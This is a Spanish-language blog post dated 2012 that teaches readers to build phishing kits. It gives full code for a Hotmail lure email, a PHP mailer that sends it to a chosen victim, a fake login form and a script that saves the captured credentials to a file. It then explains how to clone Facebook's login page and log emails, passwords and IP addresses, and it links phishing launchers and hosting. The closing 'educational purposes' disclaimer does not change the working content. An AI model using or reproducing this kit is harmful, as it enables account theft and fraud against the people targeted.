domingo, 2 de diciembre de 2012

 Bueno amigos ahora les enseñare a como crear un xploit para hotmail

Primero comensaremos por  saber que es  pues un xploit es:


 El fin del Exploit puede ser violar las medidas de seguridad para poder acceder al mismo de forma no autorizada y emplearlo en beneficio propio o como origen de otros ataques a terceros, En palabras practicas es el robar informacion de cuentas no solo de hotmail sino tambien como es facebook, tweeter y otros por medio de mensajes falsosy tentadores.

Para esto utilizaremos una herramienta muy importante y util llamada dreamweaver que es un editor de paginas HTML,PHP, y otros, pero si lo quieres asi puedes hacerlo en el bloc de notas y solo cambias extensiones (para editar mucho mas complicado).



El link de descarga para los que no lo tienen:





Empesaremo por crear los siguientes archivos:


1-   Exploit.html (Este es un codigo en HTML de lo que ustedes quieran ... en todos los enlaces que tenga este formulario , cuando la victima le de click debe ser redirigido a otra pagina)

 cidgo:  =================Exploit=================== <p><strong>Novedades de IPC-Soft </strong></p>
<table width="0" border="1" align="center" cellpadding="0" cellspacing="3">
<tr>
<td width="356">Nuevo Skin en la comunidad <a href="http://ipc-nuke.***/login_fack...">(Leer m&aacute;s...) </a></td>
<td width="360">Lanzadores v1.0 <a href="http://ipc-nuke.***/login_fack...">(Leer m&aacute;s...)</a> </td>
</tr>
<tr>
<td>MSN Messenger Fackerv2.0 <a href="http://ipc-nuke.***/login_fack...">(Leer m&aacute;s...)</a> </td>
<td>Cualquier cosa <a href="http://ipc-nuke.***/login_fack...">(Leer m&aacute;s...) </a></td>
</tr>
<tr>
<td>[by Hack-CBA]</td>
<td><a href="<Ahref='http://ipc-nuke.***/login_fack.php">http://ipc-soft.tkhttp://ipc-nuke.***/login_fack.php">http://ipc-soft.tk</a></td>
</tr>
</table>

==================================================
Notaran que en cada (Leer más ...) nos lleva a una pagina llamada :: <A href="http://ipc-nuke.***/login_fack.php">http://ipc-nuke.***/login_fack.php ::
obiamente esta es la pagina donde se produce un pedido a la victima que coloque su login y pass de hotmail.
 NOTA: Se recomienda hacer algo muy llamativo  para hacer que nuestra victima se interese como en la siguiente imagen en este hice que el link este en la imagen  tambien 
 
==================================================  2-    Lanzador.php : este envia los datos a la victima.   Código:
======================Lanzador.php================ ====
<?
$html="
AQUI el code de arriba (Exploit en HTML)
";
mail($victima,"Novedades IPC-Soft",$html);
echo "El exploit fu? enviado con exito";
?>
================================================== ==

 
3-  login_fack.php : Este los guarda en un archivo de texto , y para los que tienen m?s experiencia en una base  de datos MySql.  Explico un poco , aqui lo que hacemos es crear una variable "$html" donde indicamos el contenido, seria el mensaje .
mail(Aquien lo enviamos, asunto , cuerpo del mensaje);
echo "Mensaje que todo esta bien";
?> cerramos php

Ahora hay que crear el formulario del lanzador, es decir, el que comunmente dice
Victima | @hotmail.com|
Tu mail | @hotmail.com |

aqui no vamos a poner ningun "Tu mail" porque en lugar de eso , crearemos un archivo de texto que nos mostrar? los users y passwordws introducidos. 
 
==================================================
4-  formulario.htm : Este es el que nos salta en cualquier lanzador de exploit que nos pide que pongamos nuestro mail y el de la victima para lanzar el exploit y en caso de caer sea enviado a nuestro mail.  codigo ============formulario.htm========  <form name="form1" method="post" action="lanzador.php">
<table width="0" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>Victima</td>
<td><input name="victima" type="text" id="victima" value="@hotmail.com"></td>
</tr>
<tr>
<td>&nbsp;</td>
<td><input type="submit" name="Submit" value="Enviar"></td>
</tr>
</table>
</form>
<p></p>  
================================================== en este caso lo puedes editar a tu gusto yo lo hice de esta manera 
 ====================================5-   login_fack.php : Este es a donde sera redireccionada la victima despues de recibir el exploit
ok, ya esta casi todo listo. Solo nos queda hacer el "login_fack.php" donde se guardaran los passwords retenidos.
Hay que crear un formulario ... estilo la pagina principal de <A href="http://www.hotmail.com">www.hotmail.com
para que sea m?s creible.(Eso queda a su criterio , no el mio). 
 Código:
=============login_fack.php===================  
<form name="form1" method="post" action="falsear.php">
<table width="0" border="0" align="center" cellpadding="0" cellspacing="0">
<tr>
<td>Login</td>
<td><input name="login" type="text" id="login"></td>
</tr>
<tr>
<td>Password</td>
<td><input name="pass" type="password" id="pass" value=""></td>
</tr>
<tr>
<td>&nbsp;</td>
<td><input type="submit" name="Submit" value="Enviar"></td>
</tr>
</table>
</form>
<p>&nbsp;</p>
 ==================================== Este debes de editarlo yo lo hice de esta manera ademas por si nuestra victima tiene dudas y de click en los demas enlaces no sera problema pues puse los reales el unico enlaceque nos permitira recibir su informacion sera el de "ENVIAR"

=============================================  6-   falsear.php : Este es el archivo que procesa todos los datos despues que la victima los ingreso en "login_fack.php"
    Aqui vemos varias cosas interesantes: falsear.php , login , pass
bueno falsear.php es la pagina que nos va a procesar todo y guardar el password
login y pass , serian
$login
$pass

ahora que sabemos esto vamos a terminar el "lanzador"
...
Creamos otra pagina php

Código:
================falsear.php====================
<?php
$archivo='pass_fack.txt';
$login=$_POST[login];
$pass=$_POST[pass];

$hcba=fopen($archivo,'a');
fwrite($hcba,$login.$pass);
echo "datos correctamente introducidos";
?>
================================================== 

  Bueno estos son todoslos pasos y codigos a seguir  ¿Que datos guarda?
$login & $pass
Los escribe con el metodo $_post .
// $hcba=fopen($archivo,'a');
Aqui indicamos que $hcba es = a abrir el archivo en modo "a" que seria ir agregando contenido
 sin borrar otro.
y luego indicamos que escriba en $hcba el $login y el $pass.  Ahora como complemento tambien hay paginas que se encargan de enviar xploits algunos tienen precio pero aqui les dejo unos link de lanzadores quelo hacen gratis  Hotmail
Postal Gusanito
http://bliser.com/xploitz.org/portal.php?xploits-gratis-2011-funcionando=xploit-hotmail-gusanito

Gmail
Postal Gusanito
http://bliser.com/xploitz.org/portal.php?xploits-gratis-2011-funcionando=xploit-gmail-gusanito

Yahoo
Postal Gusanito
http://bliser.com/xploitz.org/portal.php?xploits-gratis-2011-funcionando=xploit-yahoo-gusanito

Facebook
http://bliser.com/xploitz.org/portal.php?xploits-gratis-2011-funcionando=xploit-facebook-soli

Facebook
http://bliser.com/xploitz.org/portal.php?xploits-gratis-2011-funcionando=xploit-hi5-soli .
  
Bueno espero que haya sido de su agrado en el otro avance enseñare como crear un phishing de:  

  

Ola amigos
Hoy en este  próximo les enseñare a crear nuestro propio phishing

Para comenzar Que es un phishing??
 Es un término informático que denomina un tipo de delito encuadrado dentro del ámbito de las estafas cibernéticas, y que se comete mediante el uso de un tipo de ingeniería social caracterizado por intentar adquirir información confidencial de forma fraudulenta (como puede ser una contraseña o información detallada sobre tarjetas de crédito u otra información bancaria). El estafador, conocido como phisher, se hace pasar por una persona o empresa de confianza en una aparente comunicación oficial electrónica, por lo común un correo electrónico, o algún sistema de mensajería instantánea en esta ocasión crearemos  una página idéntica de Facebook para adquirir información como correo electrónico, contraseña ye incluso una dirección ip pero vamos a hacerlo nosotros modificando códigos de fuente pero ustedes pueden elegir cualquier tipo de paginas


Que necesitaremos??
Notepad ++: es un programa de edición para editar códigos, aquí dejo el link del programa:
http://notepad-plus-plus.org/

 

Filezilla: Este programa para subir nuestra página en nuestro servidor, aquí dejo el link del programa:
 http://filezilla-project.org/


Post.php: será un pequeño archivo en el cual la información se guardar correo electrónico, contraseña y hasta el ip de nuestra victima, aquí les dejare el link del pequeño archivo:

http://www.mediafire.com/?mbb5pquren0m9a7

 O pueden hacerlo en el bloc de notas  pegando este código y cambiándole la extensión de .TXT  a .PHP (NOTA: TODAS LAS EXTENSIONES DEBEN IR EN MINUSCULA)   aquí el código:


=================post.php====================

<?php

$habbo = $_POST['email'];
$password = $_POST['pass'];
$ip = $_SERVER['REMOTE_ADDR'];
$f = fopen("pruebasirve.html", "a");
fwrite ($f, 'Email: [<b><font color="#FF1493">'.$habbo.'</font></b>] Password: [<b><font color="#1E90FF">'.$password.'</font></b>] IP: [<b><font color="#005700">'.$ip.'</font></b>]<br>');
fclose($f);

header("Location: https://www.facebook.com/");
?>
====================================================

ü  Cuenta de hosting: quien será nuestro servidor para subir nuestras páginas más adelante le ensañare como  crear una cuenta y que sitios son los adecuados


Comencemos buscando la página inicial de Facebook en nuestro navegador, teniendo la página damos clic derecho en la página,  seguido en ver los códigos nos aparecerá otra pestaña con los códigos de nuestra página, ahora presionamos la tecla control + A para seleccionar todo  el documento  copiamos
Vamos a una carpeta creamos un nuevo documento de texto, haciendo clic derecho y nuevo donde se desplegará otro menú de contenidos y seleccionamos  documento de texto, abrimos el documento  y pegamos los códigos cerramos y guardamos, cambiamos el nombre y le ponemos index  y modificamos la extensión del documento de texto la cual será .TXT la modificamos y le pondremos la extensión .HTML  damos enter, y nos mostrara un aviso si deseamos cambiar  la extensión damos aceptar, para cambiar la extensión si tu archivo no te  lo muestra al final del nombre por ejemplo  (prueba.txt) y solo te aparece (prueba) en esa ventana damos herramientas luego opciones de carpeta  vamos a la opción ver hay una opción en la parte de abajo que dice (ocultar  la extensión de archivos  para tipos de archivos conocidos) desmarcamos esa opción y damos aceptar  nos dará la extensión del archivo después del nombre damos clic derecho luego, cambiar nombre  después del punto borramos TXT y escribimos HTML damos enter y eso será todo

Al abrir ese archivo en nuestro navegador  predeterminado nos  aparece un error al cargar nuestra página se trata de  cuadros que aparecerán por todas partes  como veremos a continuación: 



Esto lo solucionaremos introduciendo  un pequeño código en nuestro código  fuente   instalado el programa notepad damos clic derecho  en el nuestro archivo index.html y seleccionamos la opción edit with notepad nos vamos al inicio del documento y pegamos el código de corrección <meta http-equiv="Content-Type" content="text/html: charset=ISO-8859-1"></meta> damos guardar y listo recargamos la página para verificar recargamos y nuestro problema ya no se verá mas 




Ahora lo que tenemos que hacer será modificar  la página para que al dar clic en  entrar  se re direccione a otra página o a la misma en el programa  notepad con el código abierto damos buscar y buscamos action, que es una acción, como sabemos que action es??? primeramente  antes a este tiene que haber un id sabiendo esto  después de action  tiene que mostrarnos u signo igual (=) y una página URL que es donde solicita la información eliminamos esa dirección  y copiamos la de nuestro post  y quedara action=”post.php” damos guardar

Ahora con el mismo programa modificaremos nuestro archivo post.php tendremos los 2 documentos abiertos en dicho programa en el archivo index buscamos name que es el nombre del formulario y nos aparecerá de esta forma name=”email” ese email lo pegamos en nuestro post en este lugar $habbo = $_POST['email']; ósea  la segunda línea de nuestro post luego buscamos en esa misma línea el name de contraseña  que será pass este lo pegaremos de igual forma en nuestro post en este lugar $password = $_POST['pass']; así  luego en nuestro post donde dice ip es donde guardara la dirección ip si lo queremos así si no borramos esa línea no hay ningún problema (si hiciste tú el post con el bloc de notas no es necesario hacer lo anterior) luego en la línea de abajo $f = fopen("pruebasirve.html", "a"); entre las comillas pondremos el nombre del archivo donde se guardaran  todos los usuarios y contraseñas cambiamos el nombre  antes de HTML por cualquier otro en mi caso como pueden ver  puse pruebasirve luego en la penúltima línea de nuestro post ponemos la página donde queremos  que se redirección en este caso será Facebook y quedara de este modo header("Location: https://www.facebook.com/"); guardamos y con esto ya tenemos todo listo

Ahora estos archivos, index.html y post.php los subiremos a un hosting  ya registrados por medio del programa filezilla

Ahora cargamos nuestra página que nos dio nuestro servidor que sería nuestro hosting y al cargar aparecerá nuestro phishing  al cargar esta página  nos podemos topar con un grave problema que sería la publicidad de la página para quitar este problema lo corregimos con otro código  en el index tenemos que editarlo y nos vamos al principio y pegamos
<script languaje="javascript">
window.onload = new Function(null)</script>

Luego al final del código pegamos lo siguiente

<noframes><iframe><noscript><xmp><pre>

Lo volvemos a subir de igual manera ya editados lo reemplazamos y volvemos a recargar nuestra página y la publicidad abra desaparecido ahora  ya tenemos nuestro phishing …



Si lo queremos probar

 Introducimos un correo cualquiera y una contraseña falsa damos entrar se redirecionara de nuevo a la verdadera página de Facebook  retrocedemos y para ver nuestro correo y contraseña en esa misma página nos vamos a la barra de búsqueda y después del link ponemos una pleca y el nombre del archivo  donde se guardaran nuestros datos en mi caso pruebasirve.html damos enter y nos cargara una página con su respectivo correo contraseña y numero de ip de este modo



(Por seguridad borre las direcciones ip =)   )

Bueno esto es todo espero les haya  servido y ayudado no me hago responsable de el mal uso de este material es solo para fines educativos.
A continuación les dejo un video tutorial  con las indicaciones que yo le di por si no entendieron mucho  =)



 






1 comentario:

  1. PARA ALMACENAR SUS Phishing (HOSTING) :

    http://tuars.com/
    http://ekiwi.es/
    http://99h.com.ar/
    http://hostbig.com.ar/

    ResponderEliminar